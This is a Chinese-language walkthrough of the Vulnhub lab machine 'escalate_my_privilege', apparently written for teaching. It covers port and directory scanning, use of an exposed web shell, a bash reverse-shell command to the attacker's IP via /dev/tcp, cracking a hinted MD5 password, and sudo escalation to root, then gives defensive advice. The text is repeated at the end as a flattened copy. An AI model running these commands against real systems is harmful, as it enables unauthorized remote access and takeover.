初试vulnhub靶场 escalate_my_privilege
字数 1100 2025-08-15 21:30:47

Vulnhub靶场:escalate_my_privilege 渗透测试教学文档

靶场概述

escalate_my_privilege是Vulnhub平台提供的一个基础渗透测试靶机,主要训练Linux系统渗透测试的基本技能,包括:

  • 信息收集
  • Web应用漏洞利用
  • 权限提升技术
  • Linux命令操作熟练度

环境准备

  1. 从Vulnhub下载靶机镜像:https://www.vulnhub.com
  2. 使用VMware或VirtualBox导入虚拟机
  3. 启动靶机,记下分配的IP地址(通常显示在启动画面上)

渗透测试步骤

1. 信息收集

网络扫描:

nmap -sV -p- <靶机IP>

发现开放端口:

  • 22/tcp - SSH服务
  • 80/tcp - HTTP服务

Web目录扫描:

dirb http://<靶机IP> /usr/share/wordlists/dirb/common.txt

发现关键文件:phpbash.php

2. 漏洞利用

Web Shell访问:
访问 http://<靶机IP>/phpbash.php 发现一个可执行命令的Web Shell

反弹Shell建立:
在攻击机上监听:

nc -lvnp 4444

在Web Shell中执行:

bash -i >& /dev/tcp/<攻击机IP>/4444 0>&1

3. 横向移动

查找凭证:

cd /home/armour
cat Credentials.txt

文件内容提示:rootroot1 的MD5哈希就是armour用户的密码

生成密码:

echo -n "rootroot1" | md5sum

得到MD5哈希:63a9f0ea7bb98050796b649e85481845

切换用户:

su armour
密码:63a9f0ea7bb98050796b649e85481845

4. 权限提升

方法一:sudo提权

sudo /bin/bash

直接获取root权限

方法二:利用crontab(备选)
检查root用户的定时任务:

cat /etc/crontab

如果有以root权限运行的可写脚本,可以修改该脚本获取root权限

5. 获取flag

成功提权后,在/root目录下查找flag文件:

cd /root
ls
cat flag.txt 或 cat proof.txt

技术要点总结

  1. 信息收集重要性:通过目录扫描发现phpbash.php是关键突破口
  2. Web Shell利用:phpbash.php提供了直接命令执行能力
  3. 凭证破解:理解提示信息并正确生成MD5哈希
  4. 权限提升方法
    • 直接sudo提权是最简单的方式
    • 通过crontab提权是常见备选方案
  5. Linux命令熟练度:整个渗透过程需要熟练掌握Linux基本命令

防御建议

  1. 避免在生产环境部署Web Shell测试页面
  2. 使用强密码策略,避免使用简单密码
  3. 定期审计sudo权限和crontab任务
  4. 最小化网络服务暴露面
  5. 实施适当的文件权限控制

扩展学习

  1. 尝试不使用phpbash.php,寻找其他攻击路径
  2. 探索其他提权方法(如SUID、内核漏洞等)
  3. 练习使用Metasploit框架完成相同目标
  4. 研究如何加固此类系统防止类似攻击

通过这个靶场,可以很好地训练基础的Linux系统渗透测试技能,为更复杂的渗透测试场景打下坚实基础。

Vulnhub靶场:escalate_ my_ privilege 渗透测试教学文档 靶场概述 escalate_ my_ privilege是Vulnhub平台提供的一个基础渗透测试靶机,主要训练Linux系统渗透测试的基本技能,包括: 信息收集 Web应用漏洞利用 权限提升技术 Linux命令操作熟练度 环境准备 从Vulnhub下载靶机镜像:https://www.vulnhub.com 使用VMware或VirtualBox导入虚拟机 启动靶机,记下分配的IP地址(通常显示在启动画面上) 渗透测试步骤 1. 信息收集 网络扫描: 发现开放端口: 22/tcp - SSH服务 80/tcp - HTTP服务 Web目录扫描: 发现关键文件: phpbash.php 2. 漏洞利用 Web Shell访问: 访问 http://<靶机IP>/phpbash.php 发现一个可执行命令的Web Shell 反弹Shell建立: 在攻击机上监听: 在Web Shell中执行: 3. 横向移动 查找凭证: 文件内容提示: rootroot1 的MD5哈希就是armour用户的密码 生成密码: 得到MD5哈希: 63a9f0ea7bb98050796b649e85481845 切换用户: 4. 权限提升 方法一:sudo提权 直接获取root权限 方法二:利用crontab(备选) 检查root用户的定时任务: 如果有以root权限运行的可写脚本,可以修改该脚本获取root权限 5. 获取flag 成功提权后,在/root目录下查找flag文件: 技术要点总结 信息收集重要性 :通过目录扫描发现phpbash.php是关键突破口 Web Shell利用 :phpbash.php提供了直接命令执行能力 凭证破解 :理解提示信息并正确生成MD5哈希 权限提升方法 : 直接sudo提权是最简单的方式 通过crontab提权是常见备选方案 Linux命令熟练度 :整个渗透过程需要熟练掌握Linux基本命令 防御建议 避免在生产环境部署Web Shell测试页面 使用强密码策略,避免使用简单密码 定期审计sudo权限和crontab任务 最小化网络服务暴露面 实施适当的文件权限控制 扩展学习 尝试不使用phpbash.php,寻找其他攻击路径 探索其他提权方法(如SUID、内核漏洞等) 练习使用Metasploit框架完成相同目标 研究如何加固此类系统防止类似攻击 通过这个靶场,可以很好地训练基础的Linux系统渗透测试技能,为更复杂的渗透测试场景打下坚实基础。